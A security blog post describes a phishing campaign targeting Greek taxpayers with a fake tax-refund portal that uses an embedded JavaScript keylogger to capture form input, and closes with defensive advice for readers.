Phishing hooks

Tax refund phish logs keystrokes to swipe personal details

There’s been some smart phishing campaigns running over the last few weeks, and this one is particularly sneaky. Bleeping Computer reports that a phishing page is targeting Greek taxpayers with a tax refund scam. The added sting in the tail comes in the form of an embedded keylogger which grabs everything entered onto the page.

An untimely tax refund

The phishing mails rely on that time-honoured tradition of bogus tax returns and non-existent refunds. The landing page, which mimics an official portal, reads as follows:

The Hellenic Tax Office has calculated your tax return, you are entitled to a tax refund of Є634.13 (around $633 USD). We have tried to transfer the amount to your account. Unfortunately we were unable to confirm your current account number.

What follows is a drop-down form where the victim can select their bank and “log into the portal”. According to researchers at Cyble, there are several URLs being used to phish victims and they all do a decent job of imitating the real deal. Multiple major banks are listed in the drop-down menu, and the bogus bank pages closely resemble the real thing. Unfortunately for site visitors, this is where the previously mentioned sting in the tail comes into play.

A sneaky way to grab data

Phishing sites typically rely on the visitor hitting the submit button to send their personal information into the hands of the scammers. If someone realises something isn’t quite right at the last minute and abandons ship, the scammers are left with nothing.

In this case, the site has an embedded JavaScript keylogger ticking away in the background. What this means is that anything entered into the various entry boxes is grabbed via the keylogger and immediately sent to the fraudsters. In this scenario, realising something is wrong may not save the victim. Anything they punched into the site up to that point will already be waiting for the phisher to retrieve at their leisure. Sure, they may have only entered information which won’t help attackers, but smart scammers using this technique will likely front load entry forms with the important details first.

What can you do?

Tools used to block third-party trackers reportedly aren’t effective against this kind of embed. With that being the case:

  • Tax refunds are rather rare for most people, so question the authenticity of such a claim should you receive one. Contact your local tax authority directly. Many host an up-to-date list of common and current tax scams, which may help to answer your question before you’ve even picked up the phone.

  • Rogue attachments are common where fake tax refunds are concerned. If you happen to open a file from someone you weren’t expecting, don’t disable your software’s “read only” mode or its closest equivalent. Steer clear of enabling Macros, too.

  • If you believe you’ve entered any data on a phishing site, there’s a small chance it may have a JavaScript keylogger running under the hood. If you know your way around code, you might be able to spot it. If not, you’re left with the hassle of trying to figure out if you need to take some action. Did the site ask for logins upfront, before anything else? Payment details? Certain forms of personal information? It’s time to do a small risk assessment checklist, and then make the appropriate decision as to whether you need to change passwords, cancel your card, or more.

Malwarebytes users are protected from the domains used in this attack. Stay safe out there!


Christopher Boyd

Former Director of Research at FaceTime Security Labs. He has a very particular set of skills. Skills that make him a nightmare for threats like you.